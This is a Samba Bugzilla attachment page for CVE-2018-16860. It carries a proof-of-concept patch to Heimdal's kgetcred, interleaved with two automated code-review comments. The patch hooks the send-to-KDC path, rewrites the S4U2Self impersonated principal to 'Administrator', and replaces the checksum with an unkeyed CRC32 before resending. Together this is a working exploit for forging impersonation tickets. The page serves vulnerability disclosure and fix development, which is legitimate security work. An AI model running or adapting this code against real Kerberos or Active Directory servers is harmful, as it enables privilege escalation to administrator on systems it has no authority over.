The Samba-Bugzilla – Attachment 14669 Details for
Bug 13685
[SECURITY] CVE-2018-16860 S4U2Self with unkeyed checksum
[patch]
demonstrator
unkeyed_s4u2self.patch (text/plain), 3.72 KB, created by
Andrew Bartlett
on 2018-11-20 04:16:20 UTC
Description:
demonstrator
Filename:
MIME Type:
Creator:
Andrew Bartlett
Created:
2018-11-20 04:16:20 UTC
Size:
3.72 KB
patch
obsolete
>From 9177b748bfba6408017a1a14fb06cc5202902c18 Mon Sep 17 00:00:00 2001
>From: Isaac Boukris <iboukris@gmail.com>
>Date: Wed, 14 Nov 2018 03:15:22 +0200
>Subject: [PATCH] poc: unkeyed s4u2self checksum overwritten on wire
>
>Signed-off-by: Isaac Boukris <iboukris@gmail.com>
>---
> source4/heimdal/kuser/kgetcred.c | 119 +++++++++++++++++++++++++++++++++++++++
> 1 file changed, 119 insertions(+)
>
>diff --git a/source4/heimdal/kuser/kgetcred.c b/source4/heimdal/kuser/kgetcred.c
>index b95bc9d05e2..f92e1e5e3c2 100644
>--- a/source4/heimdal/kuser/kgetcred.c
>+++ b/source4/heimdal/kuser/kgetcred.c
>@@ -31,6 +31,10 @@
> * SUCH DAMAGE.
> */
>
>+#include <send_to_kdc_plugin.h>
>+
>+#include "krb5_locl.h"
>+
> #include "kuser_locl.h"
>
> static char *cache_str;
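Review bot: The new `#include "krb5_locl.h"` pulls libkrb5's private header into a user-facing tool; it appears to be there only so the later hunk can call `_krb5_s4u2self_to_checksumdata`, which is not part of the exported krb5 API. A one-line comment next to the include would stop a reader from treating this as a supported dependency, e.g. `/* PoC only: private libkrb5 header, needed for _krb5_s4u2self_to_checksumdata */`. The Subject line already marks the patch as a proof of concept, so the include is acceptable for a demonstrator but should not be carried into a real fix.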
>@@ -91,6 +95,116 @@ usage(int ret)
> exit (ret);
> }
>
>+static krb5_error_code
>+plugin_init(krb5_context context, void **pctx)
>+{
>+ *pctx = NULL;
>+ return 0;
>+}
>+
>+static void
>+plugin_fini(void *ctx)
>+{
>+}
>+
>+static krb5_error_code
>+plugin_send_to_kdc(krb5_context context,
>+ void *ctx,
>+ krb5_krbhst_info *ho,
>+ time_t timeout,
>+ const krb5_data *in,
>+ krb5_data *out)
>+{
>+ return KRB5_PLUGIN_NO_HANDLE;
>+}
>+
>+static krb5_error_code
>+my_plugin_send_to_realm(krb5_context context,
>+ void *ctx,
>+ krb5_const_realm realm,
>+ time_t timeout,
>+ const krb5_data *in,
>+ krb5_data *out)
>+{
>+ krb5_error_code ret;
>+ KDC_REQ req;
>+ const PA_DATA *sdata;
>+ size_t used;
>+ krb5_data mod_buf;
>+ krb5_crypto crypto;
>+ krb5_data data;
>+ PA_S4U2Self self;
>+ const char *str;
>+ krb5_principal mod_princ;
>+ int i = 0;
>+
>+ static bool off = false;
>+
>+ if(off)
>+ return KRB5_PLUGIN_NO_HANDLE;
>+
>+ ret = decode_TGS_REQ(in->data, in->length, &req, &used);
>+
>+ if (ret)
>+ return KRB5_PLUGIN_NO_HANDLE;
>+
>+ sdata = krb5_find_padata(req.padata->val, req.padata->len,
>+ KRB5_PADATA_FOR_USER, &i);
>+ if (sdata == NULL)
>+ return KRB5_PLUGIN_NO_HANDLE;
>+
>+ ret = decode_PA_S4U2Self(sdata->padata_value.data,
>+ sdata->padata_value.length,
>+ &self, NULL);
>+ if (ret)
>+ return ret;
>+
>+ ret = krb5_parse_name(context, "Administrator", &mod_princ);
>+ if (ret)
>+ return ret;
>+
>+ self.name = mod_princ->name;
>+
>+ ret = _krb5_s4u2self_to_checksumdata(context, &self, &data);
>+ if (ret)
>+ return ret;
>+
>+ ret = krb5_create_checksum(context,
>+ NULL,
>+ KRB5_KU_OTHER_CKSUM,
>+ CKSUMTYPE_CRC32,
>+ data.data,
>+ data.length,
>+ &self.cksum);
>+
>+ ASN1_MALLOC_ENCODE(PA_S4U2Self, req.padata->val[i].padata_value.data,
>+ req.padata->val[i].padata_value.length, &self, &used, ret);
>+ if (ret)
>+ return ret;
>+
>+ ASN1_MALLOC_ENCODE(TGS_REQ, mod_buf.data, mod_buf.length, &req, &used, ret);
>+ if (ret)
>+ return ret;
>+
>+ off = true;
>+
>+ ret = krb5_sendto_kdc(context, &mod_buf, &realm, out);
>+ if (ret)
>+ krb5_err(context, 1, ret, "krb5_sendto_kdc");
>+
>+ off = false;
>+
>+ return 0;
>+}
>+
>+static krb5plugin_send_to_kdc_ftable my_plugin_ftable = {
>+ KRB5_PLUGIN_SEND_TO_KDC_VERSION_2,
>+ plugin_init,
>+ plugin_fini,
>+ plugin_send_to_kdc,
>+ my_plugin_send_to_realm
>+};
>+
> int
> main(int argc, char **argv)
> {
>@@ -160,6 +274,11 @@ main(int argc, char **argv)
> krb5_err(context, 1, ret, "krb5_parse_name %s", impersonate_str);
> krb5_get_creds_opt_set_impersonate(context, opt, impersonate);
> krb5_get_creds_opt_add_options(context, opt, KRB5_GC_NO_STORE);
>+
>+ ret = krb5_plugin_register(context, PLUGIN_TYPE_DATA, KRB5_PLUGIN_SEND_TO_KDC, &my_plugin_ftable);
>+ if (ret)
>+ krb5_err(context, 1, ret, "krb5_plugin_register");
>+
> krb5_free_principal(context, impersonate);
> }
>
>--
>2.14.4
>
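Review bot: In my_plugin_send_to_realm the result of `krb5_create_checksum` is dropped, so on failure `self.cksum` is encoded uninitialised, and `req.padata` is dereferenced in the `krb5_find_padata` call without a NULL check even though the decoded field is optional; add `if (ret) return ret;` after the checksum call and `if (req.padata == NULL) return KRB5_PLUGIN_NO_HANDLE;` after the decode. Nothing the function decodes or allocates (`req`, `self`, `data`, `mod_princ`, `mod_buf`) is ever released, every early `return` after a successful `decode_TGS_REQ` leaks `req`, and because `self.name` aliases `mod_princ->name` a later free of both would double-free, so a single cleanup path that releases each object once would be needed if this were more than a demonstrator. `crypto` and `str` are declared but never used. The function is contained entirely within this hunk.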